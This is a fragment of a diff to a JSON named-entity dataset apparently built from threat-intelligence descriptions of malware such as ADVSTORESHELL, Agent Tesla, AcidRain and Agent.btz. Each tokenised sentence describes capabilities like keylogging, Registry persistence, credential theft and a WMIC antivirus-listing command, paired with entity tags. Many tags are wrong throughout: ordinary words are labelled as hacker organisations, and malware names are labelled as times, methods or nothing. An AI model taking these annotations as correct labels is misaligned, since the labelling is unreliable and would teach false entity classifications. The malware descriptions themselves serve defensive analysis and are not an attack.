"O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "variant", + "of", + "ADVSTORESHELL", + "encrypts", + "some", + "C2", + "with", + "RSA." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Some", + "variants", + "of", + "ADVSTORESHELL", + "achieve", + "persistence", + "by", + "registering", + "the", + "payload", + "as", + "a", + "Shell", + "Icon", + "Overlay", + "handler", + "COM", + "object." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "exfiltrates", + "data", + "over", + "the", + "same", + "channel", + "used", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "delete", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "list", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "perform", + "keylogging." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "stores", + "output", + "from", + "command", + "execution", + "in", + "a", + ".dat", + "file", + "in", + "the", + "%TEMP%", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "is", + "capable", + "of", + "setting", + "and", + "deleting", + "Registry", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "is", + "capable", + "of", + "starting", + "a", + "process", + "using", + "CreateProcess." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Most", + "of", + "the", + "strings", + "in", + "ADVSTORESHELL", + "are", + "encrypted", + "with", + "an", + "XOR-based", + "algorithm;", + "some", + "strings", + "are", + "also", + "encrypted", + "with", + "3DES", + "and", + "reversed.", + "API", + "function", + "names", + "are", + "also", + "reversed,", + "presumably", + "to", + "avoid", + "detection", + "in", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "list", + "connected", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "enumerate", + "registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "achieves", + "persistence", + "by", + "adding", + "itself", + "to", + "the", + "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "Registry", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "has", + "used", + "rundll32.exe", + "in", + "a", + "Registry", + "value", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "collects,", + "compresses,", + "encrypts,", + "and", + "exfiltrates", + "data", + "to", + "the", + "C2", + "server", + "every", + "10", + "minutes." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C2", + "traffic", + "from", + "ADVSTORESHELL", + "is", + "encrypted,", + "then", + "encoded", + "with", + "Base64", + "encoding." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "variant", + "of", + "ADVSTORESHELL", + "encrypts", + "some", + "C2", + "with", + "3DES." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "run", + "Systeminfo", + "to", + "gather", + "information", + "about", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "connects", + "to", + "port", + "80", + "of", + "a", + "C2", + "server", + "using", + "Wininet", + "API.", + "Data", + "is", + "exchanged", + "via", + "HTTP", + "POSTs." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "can", + "create", + "a", + "remote", + "shell", + "and", + "run", + "a", + "given", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ANDROMEDA", + "can", + "download", + "additional", + "payloads", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "ANDROMEDA", + "has", + "been", + "delivered", + "through", + "a", + "LNK", + "file", + "disguised", + "as", + "a", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ANDROMEDA", + "has", + "been", + "installed", + "to", + "`C:\\Temp\\TrustedInstaller.exe`", + "to", + "mimic", + "a", + "legitimate", + "Windows", + "installer", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ANDROMEDA", + "can", + "inject", + "into", + "the", + "`wuauclt.exe`", + "process", + "to", + "perform", + "C2", + "actions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ANDROMEDA", + "can", + "establish", + "persistence", + "by", + "dropping", + "a", + "sample", + "of", + "itself", + "to", + "`C:\\ProgramData\\Local", + "Settings\\Temp\\mskmde.com`", + "and", + "adding", + "a", + "Registry", + "run", + "key", + "to", + "execute", + "every", + "time", + "a", + "user", + "logs", + "on." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ANDROMEDA", + "has", + "been", + "spread", + "via", + "infected", + "USB", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ANDROMEDA", + "has", + "the", + "ability", + "to", + "make", + "GET", + "requests", + "to", + "download", + "files", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ASPXSpy", + "is", + "a", + "Web", + "shell.", + "The", + "ASPXTool", + "version", + "used", + "by", + "Threat", + "Group-3390", + "has", + "been", + "deployed", + "to", + "accessible", + "servers", + "running", + "Internet", + "Information", + "Services", + "(IIS)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AcidRain", + "performs", + "an", + "in-depth", + "wipe", + "of", + "the", + "target", + "filesystem", + "and", + "various", + "attached", + "storage", + "devices", + "through", + "either", + "a", + "data", + "overwrite", + "or", + "calling", + "various", + "IOCTLS", + "to", + "erase", + "it." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AcidRain", + "iterates", + "over", + "device", + "file", + "identifiers", + "on", + "the", + "target,", + "opens", + "the", + "device", + "file,", + "and", + "either", + "overwrites", + "the", + "file", + "or", + "calls", + "various", + "IOCTLS", + "commands", + "to", + "erase", + "it." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AcidRain", + "identifies", + "specific", + "files", + "and", + "directories", + "in", + "the", + "Linux", + "operating", + "system", + "associated", + "with", + "storage", + "devices." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AcidRain", + "reboots", + "the", + "target", + "system", + "once", + "the", + "various", + "wiping", + "processes", + "are", + "complete." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "can", + "collect", + "local", + "data", + "from", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "can", + "use", + "Base64", + "to", + "decode", + "actor-controlled", + "C2", + "server", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "has", + "the", + "ability", + "to", + "collect", + "drive", + "and", + "file", + "information", + "on", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "has", + "the", + "ability", + "to", + "download", + "additional", + "payloads", + "onto", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT's", + "commands,", + "strings,", + "and", + "domains", + "can", + "be", + "Base64", + "encoded", + "within", + "the", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "can", + "identify", + "AV", + "products", + "on", + "an", + "infected", + "host", + "using", + "the", + "following", + "command:", + "`cmd.exe", + "WMIC", + "/Node:localhost", + "/Namespace:\\\\root\\SecurityCenter2", + "Path", + "AntiVirusProduct", + "Get", + "displayName", + "/Format:List`." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "has", + "the", + "ability", + "to", + "collect", + "the", + "hostname,", + "OS", + "version,", + "and", + "OS", + "architecture", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "has", + "the", + "ability", + "to", + "collect", + "the", + "MAC", + "address", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "has", + "the", + "ability", + "to", + "collect", + "the", + "username", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "can", + "use", + "HTTP", + "to", + "communicate", + "with", + "C2", + "servers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "commands", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Action", + "RAT", + "can", + "use", + "WMI", + "to", + "gather", + "AV", + "products", + "installed", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "B-HackOrg", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AdFind", + "can", + "enumerate", + "domain", + "users." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AdFind", + "can", + "enumerate", + "domain", + "groups." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "AdFind", + "can", + "gather", + "information", + "about", + "organizational", + "units", + "(OUs)", + "and", + "domain", + "trusts", + "from", + "Active", + "Directory." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AdFind", + "has", + "the", + "ability", + "to", + "query", + "Active", + "Directory", + "for", + "computers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "AdFind", + "can", + "extract", + "subnet", + "information", + "from", + "Active", + "Directory." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "encrypt", + "data", + "with", + "3DES", + "before", + "sending", + "it", + "over", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "the", + "ability", + "to", + "use", + "form-grabbing", + "to", + "extract", + "data", + "from", + "web", + "data", + "forms." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "steal", + "data", + "from", + "the", + "victim’s", + "clipboard." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "the", + "ability", + "to", + "extract", + "credentials", + "from", + "configuration", + "or", + "support", + "files." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "the", + "ability", + "to", + "steal", + "credentials", + "from", + "FTP", + "clients", + "and", + "wireless", + "profiles." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "gather", + "credentials", + "from", + "a", + "number", + "of", + "browsers." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "the", + "ability", + "to", + "extract", + "credentials", + "from", + "the", + "Registry." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "the", + "ability", + "to", + "decrypt", + "strings", + "encrypted", + "with", + "the", + "Rijndael", + "symmetric", + "encryption", + "algorithm." + ], + "ner_tags": [ + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "the", + "capability", + "to", + "kill", + "any", + "running", + "analysis", + "processes", + "and", + "AV", + "software." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "routines", + "for", + "exfiltration", + "over", + "SMTP,", + "FTP,", + "and", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "exploited", + "Office", + "vulnerabilities", + "such", + "as", + "CVE-2017-11882", + "and", + "CVE-2017-8570", + "for", + "execution", + "during", + "delivery." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "created", + "hidden", + "folders." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "used", + "<code>ProcessWindowStyle.Hidden</code>", + "to", + "hide", + "windows." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "download", + "additional", + "files", + "for", + "execution", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "log", + "keystrokes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "collect", + "account", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "used", + "SMTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "been", + "executed", + "through", + "malicious", + "e-mail", + "attachments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "achieve", + "persistence", + "by", + "modifying", + "Registry", + "key", + "entries." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "had", + "its", + "code", + "obfuscated", + "in", + "an", + "apparent", + "attempt", + "to", + "make", + "analysis", + "difficult.", + "Agent", + "Tesla", + "has", + "used", + "the", + "Rijndael", + "symmetric", + "encryption", + "algorithm", + "to", + "encrypt", + "strings." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "list", + "the", + "current", + "running", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "used", + "process", + "hollowing", + "to", + "create", + "and", + "manipulate", + "processes", + "through", + "sections", + "of", + "unmapped", + "memory", + "by", + "reallocating", + "that", + "space", + "with", + "its", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "inject", + "into", + "known,", + "vulnerable", + "binaries", + "on", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "add", + "itself", + "to", + "the", + "Registry", + "as", + "a", + "startup", + "program", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "dropped", + "RegAsm.exe", + "onto", + "systems", + "for", + "performing", + "malicious", + "activity." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "achieved", + "persistence", + "via", + "scheduled", + "tasks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "capture", + "screenshots", + "of", + "the", + "victim’s", + "desktop." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "primary", + "delivered", + "mechanism", + "for", + "Agent", + "Tesla", + "is", + "through", + "email", + "phishing", + "messages." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "collect", + "the", + "system's", + "computer", + "name", + "and", + "also", + "has", + "the", + "capability", + "to", + "collect", + "information", + "on", + "the", + "processor,", + "memory,", + "OS,", + "and", + "video", + "card", + "from", + "the", + "system." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "collect", + "the", + "IP", + "address", + "of", + "the", + "victim", + "machine", + "and", + "spawn", + "instances", + "of", + "netsh.exe", + "to", + "enumerate", + "wireless", + "settings." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "collect", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "collect", + "the", + "timestamp", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "access", + "the", + "victim’s", + "webcam", + "and", + "record", + "video." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "the", + "ability", + "to", + "perform", + "anti-sandboxing", + "and", + "anti-virtualization", + "checks." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "can", + "collect", + "names", + "and", + "passwords", + "of", + "all", + "Wi-Fi", + "networks", + "to", + "which", + "a", + "device", + "has", + "previously", + "connected." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent", + "Tesla", + "has", + "used", + "wmi", + "queries", + "to", + "gather", + "information", + "from", + "the", + "system." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent.btz", + "saves", + "system", + "information", + "into", + "an", + "XML", + "file", + "that", + "is", + "then", + "XOR-encoded." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent.btz", + "creates", + "a", + "file", + "named", + "thumb.dd", + "on", + "all", + "USB", + "flash", + "drives", + "connected", + "to", + "the", + "victim.", + "This", + "file", + "contains", + "information", + "about", + "the", + "infected", + "system", + "and", + "activity", + "logs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent.btz", + "attempts", + "to", + "download", + "an", + "encrypted", + "binary", + "from", + "a", + "specified", + "domain." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent.btz", + "drops", + "itself", + "onto", + "removable", + "media", + "devices", + "and", + "creates", + "an", + "autorun.inf", + "file", + "with", + "an", + "instruction", + "to", + "run", + "that", + "file.", + "When", + "the", + "device", + "is", + "inserted", + "into", + "another", + "system,", + "it", + "opens", + "autorun.inf", + "and", + "loads", + "the", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent.btz", + "collects", + "the", + "network", + "adapter’s", + "IP", + "and", + "MAC", + "address", + "as", + "well", + "as", + "IP", + "addresses", + "of", + "the", + "network", + "adapter’s", + "default", + "gateway,", + "primary/secondary", + "WINS,", + "DHCP,", + "and", + "DNS", + "servers,", + "and", + "saves", + "them", + "into", + "a", + "log", + "file." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Agent.btz", + "obtains", + "the", + "victim", + "username", + "and", + "saves", + "it", + "to", + 